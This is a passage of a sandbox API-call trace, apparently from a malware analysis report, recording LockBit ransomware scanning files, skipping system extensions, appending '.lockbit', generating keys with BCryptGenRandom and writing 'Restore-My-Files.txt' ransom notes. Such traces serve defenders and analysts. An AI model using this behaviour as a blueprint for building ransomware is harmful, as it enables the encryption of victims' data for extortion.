lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.841] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.lockbit") returned 72 [0146.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.842] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.842] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.842] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17508) returned 1 [0146.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.843] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.847] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.847] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.848] free (_Block=0x1fa2ed8) [0146.849] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.849] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.849] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x85d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153508.WMF", cAlternateFileName="")) returned 1 [0146.849] lstrcmpiW (lpString1=".", lpString2="J0153508.WMF") returned -1 [0146.849] lstrcmpiW (lpString1="..", lpString2="J0153508.WMF") returned -1 [0146.849] PathFindExtensionW (pszPath="J0153508.WMF") returned=".WMF" [0146.849] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.849] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.850] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.850] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153508.WMF") returned 1 [0146.851] lstrcmpiW (lpString1="ntldr", lpString2="J0153508.WMF") returned 1 [0146.851] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153508.WMF") returned 1 [0146.851] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153508.WMF") returned -1 [0146.851] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153508.WMF") returned -1 [0146.851] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153508.WMF") returned 1 [0146.851] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153508.WMF") returned -1 [0146.851] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.851] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned=".WMF" [0146.851] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.851] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.851] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.852] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.852] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.lockbit") returned 72 [0146.852] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.855] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.855] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.855] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=34256) returned 1 [0146.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.856] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.860] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.860] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.860] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.862] free (_Block=0x1fa2ed8) [0146.862] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.862] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.862] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x31d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153514.WMF", cAlternateFileName="")) returned 1 [0146.862] lstrcmpiW (lpString1=".", lpString2="J0153514.WMF") returned -1 [0146.862] lstrcmpiW (lpString1="..", lpString2="J0153514.WMF") returned -1 [0146.862] PathFindExtensionW (pszPath="J0153514.WMF") returned=".WMF" [0146.862] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.862] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.863] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.863] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153514.WMF") returned 1 [0146.864] lstrcmpiW (lpString1="ntldr", lpString2="J0153514.WMF") returned 1 [0146.864] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153514.WMF") returned 1 [0146.864] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153514.WMF") returned -1 [0146.864] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153514.WMF") returned -1 [0146.864] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153514.WMF") returned 1 [0146.864] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153514.WMF") returned -1 [0146.864] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.864] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned=".WMF" [0146.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.864] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.864] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.865] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.865] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.lockbit") returned 72 [0146.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.866] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.866] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.866] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12752) returned 1 [0146.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.867] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.870] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.870] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.870] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.881] free (_Block=0x1fa2ed8) [0146.881] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.881] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.881] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d08, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153516.WMF", cAlternateFileName="")) returned 1 [0146.881] lstrcmpiW (lpString1=".", lpString2="J0153516.WMF") returned -1 [0146.881] lstrcmpiW (lpString1="..", lpString2="J0153516.WMF") returned -1 [0146.881] PathFindExtensionW (pszPath="J0153516.WMF") returned=".WMF" [0146.882] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW 